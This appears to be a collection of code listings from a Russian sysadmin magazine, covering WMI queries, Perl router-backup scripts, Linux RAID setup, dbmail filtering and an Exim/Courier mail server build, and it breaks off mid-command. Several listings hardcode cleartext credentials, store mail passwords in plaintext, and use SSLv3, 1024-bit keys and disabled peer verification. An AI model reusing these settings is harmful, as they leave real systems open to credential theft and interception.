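Вы всё ещё не используете WMI? Часть I Константин Леонтьев
Win32_OperatingSystem.Name="Microsoft Windows XP Professional|C:\\WINDOWS|\\Device\\Harddisk0\\Partition1"
process list /?
wmic process list /?
wmic process list brief
wmic process list brief | find "cmd.exe"
wmic process where description='cmd.exe' list brief
wmic process call /?
wmic process where description='cmd.exe' list brief
wmic process where processid='****' call terminate(0)
wmic process where description='cmd.exe' call terminate(0)
wmic /NODE:server01 /USER:DOMAIN\Administrator /PASSWORD:qwerty /PRIVILEGES:ENABLE process where description='cmd.exe' list brief
wmic /NODE:@serverslist.txt /USER:DOMAIN\Administrator /PASSWORD:qwerty /PRIVILEGES:ENABLE process where description='cmd.exe' list brief
SELECT * FROM Win32_LogicalDisk WHERE FileSystem IS NULL
SELECT * FROM Win32_LogicalDisk WHERE FileSystem IS NOT NULL
SELECT * FROM Win32_LogicalDisk WHERE FileSystem = "NTFS"
SELECT * FROM Win32_DiskDrive WHERE Partitions < 2 OR SectorsPerTrack > 100
SELECT * FROM Win32_LogicalDisk WHERE (Name = "C:" OR Name = "D:") AND FreeSpace > 2000000 AND FileSystem = "NTFS"
SELECT * FROM Win32_NTLogEvent WHERE Logfile = 'Application'
SELECT * FROM Meta_Class WHERE __Class LIKE %Win32%
SELECT * FROM __InstanceCreationEvent WHERE TargetInstance ISA "Win32_NTLogEvent" GROUP WITHIN 600 BY TargetInstance.SourceName HAVING NumberOfEvents > 25
wmic path Win32_LogicalDisk WHERE FileSystem='NTFS' get /value
-----------------------------------------------------------------------------------------------------------------
Делаем резервное копирование конфигураций активного сетевого оборудования Андрей Бирюков
Листинг 1. Сценарий, устанавливающий соединение по протоколу Telnet
#!/usr/bin/perl
use strict;
use warnings;
use Net::Telnet ();

# Router address and login.  NOTE(review): the credentials are kept in clear
# text inside the script, as in the original listing; keep the file mode
# restrictive (0600) and use a dedicated, least-privileged account on the device.
my $hostname = "10.0.1.11";
my $user     = "user";
my $password = "password";

# Open the Telnet session and answer the login and password prompts.
# Net::Telnet dies on connection errors and timeouts by default (errmode
# "die"); the explicit "or die" keeps the script from typing into an
# unexpected prompt if the error mode is ever changed to "return".
my $t = Net::Telnet->new();
$t->open($hostname);
$t->waitfor('/login:.*$/')    or die "bad login: ", $t->lastline;
$t->print($user);
$t->waitfor('/Password:.*$/') or die "bad password: ", $t->lastline;
$t->print($password);
Листинг 2.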
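Отправка почтовых сообщений
use Mail::Sendmail;

# $result is the router's reply captured by the backup step above.
my %mail = (
    To      => 'admin@test.local',                       # recipient
    From    => 'ciscobackup@test.local',                 # sender
    Message => "Backup was finished with result:" . $result,   # message body
    SMTP    => 'smtp.mail.ru',                           # SMTP relay
);
sendmail(%mail) or die $Mail::Sendmail::error;
Листинг 3. Полный текст сценария
#!/usr/bin/perl
use strict;
use warnings;
use Net::Telnet ();
use Mail::Sendmail;

# Connection parameters.  NOTE(review): the credentials are kept in clear
# text inside the script, as in the original listing; keep the file mode
# restrictive (0600) and use a dedicated, least-privileged backup account.
my $hostname    = "10.0.1.11";   # router to back up
my $tftp_server = "10.0.1.2";    # TFTP server that receives the configuration
my $user        = "user";
my $password    = "password";

# Log in over Telnet.  Every waitfor() is checked so the script stops
# instead of typing commands into an unknown prompt.
my $t = Net::Telnet->new();
$t->open($hostname);
$t->waitfor('/login:.*$/')    or die "bad login: ", $t->lastline;
$t->print($user);
$t->waitfor('/Password:.*$/') or die "bad password: ", $t->lastline;
$t->print($password);
$t->waitfor('/Router>:.*$/')  or die "No router user mode: ", $t->lastline;

# Switch to privileged mode.  The original listing answers the enable step
# with a second login/password pair; keep the sequence the device actually
# prompts for.
$t->print("enable");
$t->waitfor('/login:.*$/')    or die "bad login: ", $t->lastline;
$t->print($user);
$t->waitfor('/Password:.*$/') or die "bad password: ", $t->lastline;
$t->print($password);
$t->waitfor('/Router#:.*$/')  or die "No router privilege mode: ", $t->lastline;

# Copy the running configuration to the TFTP server.  The original had a
# stray ";" before "or die" and an unterminated message string here.
$t->print("copy running-config tftp");
$t->waitfor('/Address or name of remote host:.*$/')
    or die "Wrong copy format: ", $t->lastline;
$t->print($tftp_server);
$t->waitfor('/Destination filename:.*$/')
    or die "Wrong copy format: ", $t->lastline;

# File name carries a UTC timestamp.  gmtime() returns a 0-based month and
# the year counted from 1900, so both are adjusted (the original produced
# e.g. "...105" for 2005); zero padding keeps the names fixed-width.
my ($sec, $min, $hour, $day, $mon, $year) = gmtime(time);
my $filename = sprintf('config%02d%02d%02d%02d%02d%04d',
                       $hour, $min, $sec, $day, $mon + 1, $year + 1900);
$t->print($filename);

# The router's answer to the copy is what gets reported by mail.
my $result = $t->getline;
$result = '' unless defined $result;
$t->waitfor('/Router#:.*$/');
$t->print("logout");

my %mail = (
    To      => 'admin@test.local',
    From    => 'ciscobackup@test.local',
    Message => "Backup was finished with result:" . $result,
    SMTP    => 'smtp.mail.ru',
);
sendmail(%mail) or die $Mail::Sendmail::error;
Листинг 4.
Сценарий с подключением по протоколу SSH
#!/usr/bin/perl
use strict;
use warnings;
use Net::Telnet ();
use Mail::Sendmail;

## Main program.  (The original listing had the closing "}" of this block
## but not the opening one.)
{
    # NOTE(review): clear-text credentials in the script, as in the original;
    # keep the file mode restrictive (0600).
    my $host        = "10.0.1.2";
    my $user        = "user";
    my $password    = "password";
    my $prompt      = '/ $/';
    my $tftp_server = "10.0.1.2";

    ## Start ssh on a pseudo-terminal; spawn() is defined below.
    my $pty = spawn("ssh", "-l", $user, $host);

    my $ssh = Net::Telnet->new(
        -fhopen                  => $pty,
        -prompt                  => $prompt,
        -telnetmode              => 0,
        -cmd_remove_mode         => 1,
        -output_record_separator => "\r",
    );

    ## Connect to the remote host.
    $ssh->waitfor(-match => '/password: ?$/i', -errmode => "return")
        or die "problem connecting to host: ", $ssh->lastline;
    $ssh->print($password);
    $ssh->waitfor(-match => $ssh->prompt, -errmode => "return")
        or die "login failed: ", $ssh->lastline;

    ## Send the commands and handle the replies.
    $ssh->waitfor(-match => '/ Router#: $/i', -errmode => "return")
        or die " Wrong copy format ", $ssh->lastline;
    $ssh->cmd("copy running-config tftp");
    $ssh->waitfor(-match => '/ Address or name of remote host: $/i', -errmode => "return")
        or die " Wrong copy format ", $ssh->lastline;
    $ssh->print($tftp_server);
    $ssh->waitfor(-match => '/ Destination filename: $/i', -errmode => "return")
        or die " Wrong copy format ", $ssh->lastline;

    # Same timestamped file name as in the Telnet script (month and year
    # adjusted, zero padded).
    my ($sec, $min, $hour, $day, $mon, $year) = gmtime(time);
    my $filename = sprintf('config%02d%02d%02d%02d%02d%04d',
                           $hour, $min, $sec, $day, $mon + 1, $year + 1900);
    $ssh->print($filename);

    # The original read the result from an undefined $t; the session is $ssh.
    my $result = $ssh->lastline;
    $result = '' unless defined $result;
    $ssh->waitfor(-match => '/ Router#: $/i', -errmode => "return")
        or die " Wrong copy format ", $ssh->lastline;
    $ssh->cmd("logout");

    my %mail = (
        To      => 'admin@test.local',
        From    => 'ciscobackup@test.local',
        Message => "Backup was finished with result:" . $result,
        SMTP    => 'smtp.mail.ru',
    );
    sendmail(%mail) or die $Mail::Sendmail::error;
    exit;
} # end main program

sub spawn {
    my(@cmd) = @_;
    my($pid, $pty, $tty, $tty_fd);

    use IO::Pty ();
    $pty = new IO::Pty or die $!;

    unless ($pid = fork) { # child process
        die "problem spawning program: $!\n" unless defined $pid;

        use POSIX ();
        POSIX::setsid or die "setsid failed: $!";

        $tty = $pty->slave;
        $tty_fd = $tty->fileno;
        close $pty;

        open STDIN, "<&$tty_fd" or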
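die $!;
        open STDOUT, ">&$tty_fd" or die $!;
        open STDERR, ">&STDOUT" or die $!;
        close $tty;

        exec @cmd or die "problem executing $cmd[0]\n";
    }

    $pty;
30 2 * * perl /tmp/telnet.pl
50 18 1,15 * perl /tmp/ssh.pl
-----------------------------------------------------------------------------------------------------------------
Современный Linux-сервер: как планировать дисковые ресурсы Алексей Барабанов
# fdisk -l /dev/sda
# fsck /dev/sda3
# mdadm -C /dev/md3 -l 1 -n 2 /dev/sda3 missing
# fsck /dev/md3
# e2fsck -f /dev/sda3
# resize2fs /dev/sda3 $(( 2622592 * 4 ))K
# e2fsck -f /dev/md3
# mount /dev/md3 /mnt
# mount | grep md3
# perl -i.orig -p -e 's,/dev/sda3,/dev/md3,g' /mnt/etc/fstab
# cat /mnt/etc/fstab | grep md3
# fdisk /dev/sda
<mailbox);
trace(TRACE_DEBUG, "%s, %s: calling sort_and_deliver for useridnr [%llu]", __FILE__, __func__, useridnr);
dsn_result = sort_and_deliver(tmpmsgidnr, msgsize, useridnr, db_get_mailbox_from_filters(useridnr, headerfields, delivery->mailbox));
char *db_get_mailbox_from_filters(u64_t useridnr, struct list *headerfields, const char *mailbox);
CREATE TABLE dbmail_filters (
    user_id INT8 REFERENCES dbmail_users(user_idnr) ON DELETE CASCADE ON UPDATE CASCADE,
    filter_id INT8,
    filter_field varchar(128) NOT NULL,
    filter_value varchar(255) NOT NULL,
    mailbox varchar(100) NOT NULL,
    PRIMARY KEY (user_id, filter_id)
);
CREATE INDEX dbmail_user_id_idx ON dbmail_filters(user_id);
CREATE INDEX dbmail_filter_id_idx ON dbmail_filters(filter_id);
/*
 * Choose the destination mailbox for a message delivered to useridnr.
 *
 * When the caller already supplies a mailbox (non-NULL) it is returned
 * unchanged.  Otherwise the user's rows in dbmail_filters are read in
 * filter_id order and the first filter whose filter_field equals a header
 * name in headerfields and whose filter_value is a substring of that
 * header's value decides the mailbox.
 *
 * Returns the mailbox name, or NULL when no filter matches or the query
 * fails.
 *
 * NOTE(review): on a match the returned pointer comes from db_get_result(),
 * i.e. it points into the pending result set, and db_free_result() is not
 * called on that path (calling it would invalidate the returned string), so
 * the result set stays allocated until the next query.  Returning a copy
 * would be the clean fix, but the caller (sort_and_deliver) does not free
 * the value and the non-NULL branch returns a borrowed pointer, so the
 * ownership contract would change; it is only flagged here.
 */
char *db_get_mailbox_from_filters(u64_t useridnr, struct list *headerfields, const char *mailbox)
{
    unsigned i;
    unsigned num_filters;

    /* "%s" with a NULL argument is undefined behaviour; glibc would print
     * "(null)", so the same text is produced explicitly. */
    trace(TRACE_MESSAGE, "%s, %s: default mailbox [%s]", __FILE__, __func__,
          mailbox != NULL ? mailbox : "(null)");

    /* An explicit mailbox from the caller overrides the filter table. */
    if (mailbox != NULL)
        return mailbox;

    /* useridnr is numeric, so the query needs no quoting beyond the format. */
    snprintf(query, DEF_QUERYSIZE,
             "SELECT filter_field, filter_value, mailbox FROM dbmail_filters "
             "WHERE user_id = '%llu' ORDER BY filter_id", useridnr);
    if (db_query(query) == -1) {
        trace(TRACE_ERROR, "%s,%s: error gettings filters for "
              "user_id [%llu]", __FILE__, __func__, useridnr);
        return NULL;
    }

    num_filters = db_num_rows();
    for (i = 0; i < num_filters; i++) {
        struct element *el = list_getstart(headerfields);
        char *filter_field = db_get_result(i, 0);
        char *filter_value = db_get_result(i, 1);
        /* Named differently from the parameter: the original declared a
         * second "mailbox" here that shadowed the default mailbox argument. */
        char *target_mailbox = db_get_result(i, 2);

        trace(TRACE_MESSAGE, "%s, %s: processing filter [%s : \"%s\" => %s]",
              __FILE__, __func__, filter_field, filter_value, target_mailbox);

        /* Walk the parsed headers; exact match on the field name,
         * substring match on the value. */
        for (; el != NULL; el = el->nextnode) {
            struct mime_record *record = (struct mime_record *) el->data;

            trace(TRACE_MESSAGE, "%s, %s: processing header [%s : \"%s\"]",
                  __FILE__, __func__, record->field, record->value);

            if (strcmp(record->field, filter_field) == 0
                && strstr(record->value, filter_value) != NULL) {
                trace(TRACE_MESSAGE,
                      "%s, %s: header [%s : \"%s\"] accept filter [%s : \"%s\" => %s]",
                      __FILE__, __func__, record->field, record->value,
                      filter_field, filter_value, target_mailbox);
                /* See the NOTE above: the result set is deliberately left
                 * allocated because the returned string lives inside it. */
                return target_mailbox;
            }
        }

        trace(TRACE_MESSAGE, "%s, %s: no header accept filter [%s : \"%s\" => %s]",
              __FILE__, __func__, filter_field, filter_value, target_mailbox);
    }

    db_free_result();
    return NULL;
}
# psql -U dbmail dbmail
dbmail=# select * from dbmail_filters;
-----------------------------------------------------------------------------------------------------------------
Штопаем дыры в Ilohamail Сергей Супрунов
Options Indexes
Order allow,deny
Deny from all
-----------------------------------------------------------------------------------------------------------------
Строим мультидоменный почтовый сервер с защитой от вирусов и спама Павел Семенец
# cd /usr/ports/databases/mysql41-server/
# make WITH_CHARSET=koi8_ru WITH_CHARSET=cp1251 WITH_CHARSET=utf8 WITH_CHARSET=latin1 WITH_XCHARSET=all all install clean
# cd /usr/local/etc/rc.d/
# mv 000.mysql-client.sh 010.mysqlc.sh
# mv mysql-server.sh 015.mysqls.sh
mysql_enable="YES"
mysql_dbdir="/usr/local/database/mysql"
# mkdir -p /usr/local/database/mysql
# chown -R mysql:mysql /usr/local/database/mysql
# /usr/local/etc/rc.d/010.mysqlc.sh start
#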
/usr/local/etc/rc.d/015.mysqls.sh start # /usr/local/bin/mysqladmin -u root password 'testpassword'; # mysql -u root -ptestpassword mysql> drop database test; mysql> use mysql; mysql> delete from db; mysql> delete from user where not (user='root' and host='localhost'); mysql> create database mail; mysql> grant all on mail.* to exim@localhost identified by 'youpassword'; mysql> \q # cd /usr/ports/mail/exim # make fetch # cd /usr/ # mkdir Install # cd Install # tar -xvjpf /usr/ports/distfiles/exim/exim-4.53.tar.bz2 # cd exim-4.53/Local # pw adduser exim -g mail -d /var/spool/mqueue -C "Exim Server" -s /usr/sbin/nologin #cat > Makefile << "EOF" BIN_DIRECTORY=/usr/sbin CONFIGURE_FILE=/etc/mail/exim.conf EXIM_USER=1001 EXIM_GROUP=6 SPOOL_DIRECTORY=/var/spool/mqueue SUPPORT_MAILDIR=yes LOOKUP_MYSQL=yes LOOKUP_INCLUDE=-I /usr/local/include/mysql LOOKUP_LIBS=-L/usr/local/lib/mysql -lmysqlclient -lz -lcrypt -lm AUTH_CRAM_MD5=yes AUTH_PLAINTEXT=yes SUPPORT_TLS=yes TLS_LIBS=-lssl -lcrypto TLS_INCLUDE=-I/usr/include/openssl LOG_FILE_PATH=syslog EXIM_PERL=perl.o SYSTEM_ALIASES_FILE=/etc/mail/aliases CHOWN_COMMAND=/usr/sbin/chown SUPPORT_MOVE_FROZEN_MESSAGES=yes ROUTER_ACCEPT=yes ROUTER_DNSLOOKUP=yes ROUTER_IPLITERAL=yes ROUTER_MANUALROUTE=yes ROUTER_QUERYPROGRAM=yes ROUTER_REDIRECT=yes TRANSPORT_APPENDFILE=yes TRANSPORT_AUTOREPLY=yes TRANSPORT_PIPE=yes TRANSPORT_SMTP=yes HEADERS_CHARSET="CP1251" HAVE_ICONV=yes CFLAGS=-O -I/usr/local/include EXTRALIBS_EXIM=-L/usr/local/lib -liconv INFO_DIRECTORY=/usr/share/info COMPRESS_COMMAND=/usr/bin/gzip COMPRESS_SUFFIX=gz ZCAT_COMMAND=/usr/bin/zcat TMPDIR="/tmp" WITH_CONTENT_SCAN=yes WITH_OLD_DEMIME=yes EOF # cd ../ # make # make install # ln -fs /usr/sbin/exim /usr/lib/sendmail # ln -fs /usr/sbin/exim /usr/sbin/sendmail # ln -fs /usr/sbin/exim /usr/bin/mailq # ln -fs /usr/sbin/exim /usr/bin/runq # strip /usr/sbin/exim* # cd /usr/local/databases # cat > exim.sql << "EOF" -- Таблица алиасов CREATE TABLE `aliases` ( `local_part` varchar(64) 
NOT NULL default '', `domain` varchar(128) NOT NULL default '', `recipients` text, PRIMARY KEY (`local_part`,`domain`) ) ENGINE=MyISAM DEFAULT CHARSET=cp1251; -- Данные о алиасах INSERT INTO `aliases` VALUES ('root', 'test.com', 'user'); INSERT INTO `aliases` VALUES ('postmaster', 'test.com', 'root'); INSERT INTO `aliases` VALUES ('mailer-daemon', 'test.com', 'postmaster'); INSERT INTO `aliases` VALUES ('uucp', 'test.com', 'root'); INSERT INTO `aliases` VALUES ('operator', 'test.com', 'root'); INSERT INTO `aliases` VALUES ('abuse', 'test.com', 'root'); INSERT INTO `aliases` VALUES ('webmaster', 'test.com', 'root'); INSERT INTO `aliases` VALUES ('hostmaster', 'test.com', 'root'); -- Таблица описания доменов CREATE TABLE `domains` ( `domain` varchar(128) NOT NULL default '', `type` enum('LOCAL','RELAY','VIRTUAL') default 'LOCAL', PRIMARY KEY (`domain`) ) ENGINE=MyISAM DEFAULT CHARSET=cp1251; -- Данные о доменах INSERT INTO `domains` VALUES ('test.com', 'LOCAL'); -- Таблица форвардинга почты CREATE TABLE `userforward` ( `local_part` varchar(64) NOT NULL default '', `domain` varchar(128) NOT NULL default '', `recipients` text, PRIMARY KEY (`local_part`,`domain`) ) ENGINE=MyISAM DEFAULT CHARSET=cp1251; -- Таблица описания пользователей CREATE TABLE `users` ( `id` varchar(64) NOT NULL default '', `crypt` varchar(64) NOT NULL default '', `passwd` varchar(64) NOT NULL default '', `uid` int(10) unsigned default '8', `gid` int(10) unsigned default '12', `mbox_host` varchar(128) NOT NULL default 'test.com', `shell` varchar(32) character set cp1251 collate cp1251_bin default '/sbin/nologin', `home` varchar(128) character set cp1251 collate cp1251_bin default '/usr/local/vmail/test.com', `quota` tinyint(4) default '30', `active` enum('Y','N') default 'Y', PRIMARY KEY (`id`,`mbox_host`) ) ENGINE=MyISAM DEFAULT CHARSET=cp1251; INSERT INTO `users` VALUES ('user', ENCRYPT('password'), 'password', 1001, 6, 'test.com','/usr/sbin/nologin','/usr/local/vmail/test.com/user', 127, 'Y'); 
EOF # mysql -u root -ptestpassword exim < exim.sql # mysql -u root -ptestpassword mysql> use exim mysql> ./exim.sql mysql> \q # cd /etc/mail/ # mkdir ssl # cd ssl # openssl req -x509 -newkey rsa:1024 -keyout mail.pem -out mail.pem -days 3650 -nodes # chmod 400 mail.pem # chown exim:mail mail.pem #cat > exim.conf << "EOF" primary_hostname = mail.test.com # Домены, для которых принимаем почту domainlist local_domains = ${lookup mysql{SELECT domain FROM domains WHERE domain='${domain}' AND (type='LOCAL' OR type='VIRTUAL')}} # Домены, которым разрешено отправлять почту через данный сервер domainlist relay_to_domains = ${lookup mysql{SELECT domain FROM domains WHERE domain='${domain}' AND type='RELAY'}} # Включаем проверку на вирусы hostlist relay_from_hosts = 127.0.0.1 av_scanner = clamd:127.0.0.1 3310 # Включаем проверку по содержимому письма acl_smtp_rcpt = acl_check_rcpt acl_smtp_data = acl_check_virus qualify_domain = test.com auth_advertise_hosts = * daemon_smtp_ports = 25 : 465 # Включаем SSL-соединение tls_on_connect_ports = 465 tls_advertise_hosts = * tls_certificate = /etc/mail/ssl/mail.pem tls_privatekey = /etc/mail/ssl/mail.pem # Включаем лог действий сервера log_selector = \ +all_parents \ +lost_incoming_connection \ +received_sender \ +received_recipients \ +smtp_confirmation \ +smtp_syntax_error \ +smtp_protocol_error \ -queue_run allow_domain_literals = false # Запрещаем привелигированным пользователям отправлять почту через данный сервер never_users = root:daemon:bin # Нет, им просто запрещается отправлять почту и все host_lookup = * rfc1413_hosts = * rfc1413_query_timeout = 0s ignore_bounce_errors_after = 30m timeout_frozen_after = 3d freeze_tell = postmaster auto_thaw = 1h message_size_limit = 10M smtp_accept_max = 50 smtp_accept_max_per_connection = 50 smtp_connect_backlog = 50 smtp_accept_max_per_host = 25 split_spool_directory = true remote_max_parallel = 15 # Подключем базу MySQL hide mysql_servers = localhost/mail/exim/youpassowrd # Подключаем 
фильтры begin acl acl_check_rcpt: deny local_parts = ^.*[@%!/|] : ^\\. accept local_parts = postmaster domains = +local_domains require verify = sender deny message = HELO/EHLO required by SMTP RFC condition = ${if eq{$sender_helo_name}{}{yes}{no}} deny message = Go Away! You are spammer. condition = ${if match{$sender_host_name}{bezeqint\\.net|net\\.il|dialup|dsl|pool|peer|dhcp}{yes}{no}} deny message = host is listed in $dnslist_domain dnslists = sbl.spamhaus.org : \ relays.ordb.org : \ opm.blitzed.org : \ proxies.blackholes.easynet.nl accept domains = +local_domains endpass message = unknown user verify = recipient accept domains = +relay_to_domains endpass message = unrouteable address verify = recipient accept hosts = +relay_from_hosts accept authenticated = * deny message = relay not permitted acl_check_virus: deny message = Messege rejected: Virus $malware_name) Found. Your message was successfully trashed. malware = * accept # Описываем транспорты и и роутеры begin routers dnslookup: driver = dnslookup domains = ! 
+local_domains transport = remote_smtp ignore_target_hosts = 0.0.0.0 : 127.0.0.0/8 no_more system_aliases: driver = redirect allow_fail allow_defer data = ${lookup mysql{SELECT recipients FROM aliases WHERE local_part='${local_part}' AND domain='${domain}'}} userforward: driver = redirect allow_fail allow_defer data = ${lookup mysql{SELECT recipients FROM userforward WHERE local_part='${local_part}' AND domain='${domain}'}} mysqluser: driver = accept condition = ${if eq{} {${lookup mysql{SELECT home FROM users WHERE id='${local_part}' AND mbox_host='${domain}' AND active='Y'}}}{no}{yes}}transport = mysql_delivery begin transports remote_smtp: driver = smtp mysql_delivery: driver = appendfile check_string = "" create_directory delivery_date_add directory = ${lookup mysql{SELECT CONCAT(home, "/Maildir") FROM users WHERE id='${local_part}' AND mbox_host='${domain}'}} directory_mode = 770 envelope_to_add group = mail maildir_format maildir_tag = ,S=$message_size message_prefix = "" message_suffix = "" mode = 0600 quota = ${lookup mysql{SELECT quota FROM users WHERE id='${local_part}' AND mbox_host='${domain}'}{${value}M}} quota_size_regex = S=(\d+)$ quota_warn_threshold = 95% return_path_add address_pipe: driver = pipe return_output address_file: driver = appendfile delivery_date_add envelope_to_add return_path_add address_reply: driver = autoreply begin retry * quota * F,2h,15m; G,16h,1h,1.5; F,4d,6h begin rewrite # Включаем аутентификацию begin authenticators # Метод - Plain auth_plain: driver = plaintext public_name = PLAIN server_condition = ${lookup mysql{SELECT id FROM users WHERE id = '${quote_mysql:${local_part:$2}}' AND mbox_host = '${quote_mysql:${domain:$2}}' AND passwd = '${quote_mysql:$3}' AND active = 'Y'}{yes}{no}} server_prompts = : server_set_id = $2 # Метод - Login auth_login: driver = plaintext public_name = LOGIN server_condition = ${lookup mysql{SELECT id FROM users WHERE id = '${quote_mysql:${local_part:$1}}' AND mbox_host = 
'${quote_mysql:${domain:$1}}' AND passwd = '${quote_mysql:$2}' AND active = 'Y'}{yes}{no}} server_prompts = Username:: : Password:: server_set_id = $1 #Метод - Cram-MD5 auth_cram_md5: driver = cram_md5 public_name = CRAM-MD5 server_secret = ${lookup mysql{SELECT passwd FROM users WHERE id = '${quote_mysql:${local_part:$1}}' AND mbox_host = '${quote_mysql:${domain:$1}}' AND active = 'Y'}{$value}fail} server_set_id = $1 EOF # cd /usr/ports/security/clamav # make all install clean # cd /usr/local/etc # cat > clamd.conf << "EOF" LogFile /var/log/clamav/clamd.log LogTime LogClean LogSyslog PidFile /var/run/clamav/clamd.pid TemporaryDirectory /var/tmp DatabaseDirectory /var/db/clamav FixStaleSocket TCPSocket 3310 TCPAddr 127.0.0.1 User clamav AllowSupplementaryGroups ScanPE ScanOLE2 ScanMail ScanHTML ScanArchive ScanRAR ArchiveMaxFiles 10000 EOF # cat > freshclam.conf << "EOF" DatabaseDirectory /var/db/clamav UpdateLogFile /var/log/clamav/freshclam.log LogVerbose PidFile /var/run/clamav/freshclam.pid DatabaseOwner clamav AllowSupplementaryGroups DatabaseMirror database.clamav.net MaxAttempts 5 Checks 3 NotifyClamd EOF # cd /usr/local/etc/rc.d # mv clamav-clamd.sh 020.clamav.sh # mv clamav-freshclam.sh 025.freshclam.sh clamav_freshclam_enable="YES" clamav_clamd_enable="YES" # ./020.clamav.sh start # ./025.freshclam.sh start # mkdir -p /usr/local/vmail # chown -R exim:mail /usr/local/vmail /var/spool/mqueue # chmod 0770 /usr/local/vmail # cat > /usr/local/etc/rc.d/030.exim.sh << "EOF" # !/bin/sh case "$1" in start) echo "starting Exim..." /usr/sbin/exim -bd -q15m ;; restart) echo "restarting Exim..." kill -HUP `cat /var/spool/mqueue/exim-daemon.pid` ;; stop) echo "stopping Exim..." 
kill -TERM `cat /var/spool/mqueue/exim-daemon.pid` ;; *) echo "Usage: $0 {start|stop|restart}" exit 1 ;; esac EOF # chmod +x /usr/local/etc/rc.d/030.exim.sh # /usr/local/etc/rc.d/030.exim.sh start # /usr/local/etc/rc.d/030.exim.sh start # perl -MMIME::Base64 -e 'print encode_base64("user\@test.com\0user\@test.com\0password");' # telnet 127.0.0.1 25 # perl -MMIME::Base64 -e 'print encode_base64("user\@test.com");' # perl -MMIME::Base64 -e 'print encode_base64("password");' # telnet 127.0.0.1 25 # telnet 127.0.0.1 25 # perl -MMIME::Base64 -e 'print MIME::Base64::decode_base64(shift), "\n"' PDUwNy4xMTI5Nzk3MzkyQG1haWwucnVzZ2F0ZS5vcmc+ # perl -MMIME::Base64 -MDigest::HMAC_MD5 -e 'print MIME::Base64::encode_base64($ARGV[0] . " " . Digest::HMAC_MD5::hmac_md5_hex($ARGV[2], $ARGV[1]))' 'user@test.ru' 'password' '<507.1129797392@mail.test.com>' # openssl OpenSSL> s_client -host localhost -port 465 # cd /usr/ports/mail/courier-imap # make all install clean # cd /usr/local/etc/authlib # cat > authdaemonrc << "EOF" authmodulelist="authmysql" authmodulelistorig="authuserdb authvchkpw authpam authldap authmysql authpgsql" daemons=5 authdaemonvar=/var/run/authdaemond subsystem=mail DEBUG_LOGIN=0 DEFAULTOPTIONS="wbnodsn=1" LOGGEROPTS="" EOF #cat > authmysqlrc << "EOF" MYSQL_SERVER localhost MYSQL_USERNAME exim MYSQL_PASSWORD youpassowrd MYSQL_PORT 3306 MYSQL_OPT 0 MYSQL_DATABASE mail MYSQL_SELECT_CLAUSE SELECT CONCAT(id,'@',mbox_host), crypt, "", 1001, 6, home, CONCAT(home,'/Maildir'), "", id, "" FROM users WHERE CONCAT(id,'@', mbox_host) = ‘'$(local_part)@$(domain)’' EOF # cd /usr/local/etc/courier-imap # cat > pop3d << "EOF" PIDFILE=/var/run/pop3d.pid MAXDAEMONS=40 MAXPERIP=4 POP3AUTH="" POP3AUTH_ORIG="PLAIN LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256" POP3AUTH_TLS="" POP3AUTH_TLS_ORIG="LOGIN PLAIN" POP3_PROXY=0 PORT=110 ADDRESS=0 TCPDOPTS="-nodnslookup -noidentlookup" LOGGEROPTS="-name=pop3d" POP3DSTART=YES MAILDIRPATH=Maildir EOF # cat > imapd << "EOF" ADDRESS=0 PORT=143 
MAXDAEMONS=40 MAXPERIP=4 PIDFILE=/var/run/imapd.pid TCPDOPTS="-nodnslookup -noidentlookup" LOGGEROPTS="-name=imapd" IMAP_CAPABILITY="IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE" IMAP_KEYWORDS=1 IMAP_CAPABILITY_ORIG="IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA AUTH=CRAM-MD5 AUTH=CRAM-SHA1 AUTH=CRAM-SHA256 IDLE" IMAP_PROXY=0 IMAP_PROXY_FOREIGN=0 IMAP_IDLE_TIMEOUT=60 IMAP_CAPABILITY_TLS="$IMAP_CAPABILITY AUTH=PLAIN" IMAP_CAPABILITY_TLS_ORIG="$IMAP_CAPABILITY_ORIG AUTH=PLAIN" IMAP_DISABLETHREADSORT=0 IMAP_CHECK_ALL_FOLDERS=0 IMAP_OBSOLETE_CLIENT=0 IMAP_UMASK=022 IMAP_ULIMITD=65536 IMAP_USELOCKS=1 IMAP_SHAREDINDEXFILE=/usr/local/etc/courier-imap/shared/index IMAP_ENHANCEDIDLE=0 IMAP_TRASHFOLDERNAME=Trash IMAP_EMPTYTRASH=Trash:7 IMAP_MOVE_EXPUNGE_TO_TRASH=0 SENDMAIL=/usr/sbin/sendmail HEADERFROM=X-IMAP-Sender IMAPDSTART=YES MAILDIRPATH=Maildir EOF # cat > imapd.cnf << "EOF" RANDFILE = /usr/local/share/courier-imap/imapd.rand [ req ] default_bits = 1024 encrypt_key = yes distinguished_name = req_dn x509_extensions = cert_type prompt = no [ req_dn ] C=RU ST=Russia Federaton L=Moscow O=Exim Super Server OU=IT DEpartament CN=mail.test.com emailAddress=abuse@test.com [ cert_type ] nsCertType = server RANDFILE = /usr/local/share/courier-imap/pop3d.rand # cd /usr/local/share/courier-imap # ./mkimapdcert # ./mppop3dcert # cd /usr/local/etc/courier-imap # mkdir ssl && cd ssl # cp /usr/local/share/courier-imap/*.pem . 
# cd ../ # cat > imapd-ssl << "EOF" SSLPORT=993 SSLADDRESS=0 SSLPIDFILE=/var/run/imapd-ssl.pid SSLLOGGEROPTS="-name=imapd-ssl" IMAPDSSLSTART=YES IMAPDSTARTTLS=YES IMAP_TLS_REQUIRED=0 COURIERTLS=/usr/local/bin/couriertls TLS_PROTOCOL=SSL3 TLS_STARTTLS_PROTOCOL=TLS1 TLS_CERTFILE=/usr/local/etc/courier-imap/ssl/imapd.pem TLS_VERIFYPEER=NONE TLS_CACHEFILE=/usr/local/var/couriersslcache TLS_CACHESIZE=524288 MAILDIRPATH=Maildir EOF # cat > pop3d-ssl << "EOF" SSLPORT=995 SSLADDRESS=0 SSLPIDFILE=/var/run/pop3d-ssl.pid SSLLOGGEROPTS="-name=pop3d-ssl" POP3DSSLSTART=YES POP3_STARTTLS=YES POP3_TLS_REQUIRED=0 COURIERTLS=/usr/local/bin/couriertls TLS_PROTOCOL=SSL3 TLS_STARTTLS_PROTOCOL=TLS1 TLS_CERTFILE=/usr/local/etc/courier-imap/ssl/pop3d.pem TLS_VERIFYPEER=NONE TLS_CACHEFILE=/usr/local/var/couriersslcache TLS_CACHESIZE=524288 MAILDIRPATH=Maildir EOF # cd /usr/local/etc/rc.d # mv courier_authdaemond.sh 035.courier-auth.sh # mv courier_imap_imapd.sh 040.courier-imap.sh # mv 